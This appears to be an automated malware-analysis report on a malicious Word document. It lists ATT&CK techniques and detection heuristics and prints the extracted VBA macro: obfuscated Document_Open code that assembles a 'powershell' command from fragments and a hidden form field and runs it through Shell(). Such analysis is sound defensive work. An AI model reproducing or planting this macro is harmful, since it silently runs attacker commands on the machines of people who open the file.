MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open auto-execution macro, which is a common technique for initial execution. The critical heuristic firing for Shell() call in VBA indicates that the macro attempts to execute commands. The script concatenates strings to form the command 'SHELL ow', which is likely intended to download and execute a secondary payload. The ClamAV detection further supports its malicious nature.
Heuristics 6
-
ClamAV: Doc.Malware.Sagent-6846843-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Sagent-6846843-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2147 bytes |
SHA-256: 8afbd2e148897d3e2a290a161e2586356b675f88f142d5878bc80f93646ddbbd |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Dim lEtUSFy(7 To 153) As String
lEtUSFy(7) = "a6H2s"
Dim iYr4X1Jxt(7 To 153) As String
iYr4X1Jxt(7) = "m8N0hM"
Dim U5GbeKjrI(14 To 88) As Long
U5GbeKjrI(14) = -114 + 238
Dim jTRhfB9iE(1 To 59) As String
jTRhfB9iE(1) = "ppKwq"
Call w("er")
End Sub
Attribute VB_Name = "QfAlPia"
Sub w(FWtswA)
Dim MsmW8h(5 To 232) As String
MsmW8h(5) = "WL8SE"
Dim nsQV6p
nsQV6p = DcoaZzG
Dim JJvbWd As Long
JJvbWd = (1081 - 1063) / (9)
Dim ry86O5Mt(16 To 47) As String
ry86O5Mt(16) = "qj0VQ3YA"
zWa41Lq2Q = "SHE" & "LL "
NAnoNR = "ow"
XmL4o8 = FWtswA
Dim C7MSyfbz(11 To 39) As Long
C7MSyfbz(11) = 21384 / 198
HzoXW DsEqD() & NAnoNR & XmL4o8 & zWa41Lq2Q & K1nCIfmh
End Sub
Attribute VB_Name = "TL3ADZOM"
Public Function DsEqD() As String
Dim U5wGQl As Long
U5wGQl = (21822 / 7274) / (37)
Dim bBxQGcbr As String
bBxQGcbr = Awtzg1ucq
Dim RBLMn(4 To 99) As Long
RBLMn(4) = 267 - 36
Dim sOFwMYkBn(11 To 101) As Long
sOFwMYkBn(11) = 15265 / 71
Dim m3CfSx
m3CfSx = TvNWcQ8
Dim UOLGe As String
UOLGe = t1UXxB
DsEqD = "p"
End Function
Function HzoXW(q372K)
HzoXW = Shell(q372K, False)
End Function
Attribute VB_Name = "MzPONdl"
Public Function K1nCIfmh()
Dim Mb23Vm5 As Object
Set Mb23Vm5 = New f
Dim dh5i6 As String
Dim MtamZgO1 As Long
MtamZgO1 = (1396 - 1389) * (10)
dh5i6 = Mb23Vm5.de.Text
Dim omYTKHX As String
omYTKHX = MXhCE
Dim sUqJFPY As Long
sUqJFPY = (1065 - 1052) * (13)
Dim wQcsJd As Long
wQcsJd = (6972 / 249) / (26)
K1nCIfmh = dh5i6
End Function
Attribute VB_Name = "f"
Attribute VB_Base = "0{7EB83F0D-8243-47CE-B7BA-B48F9901F585}{8910233A-51CC-4E9E-AD7B-CD9B7A416385}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.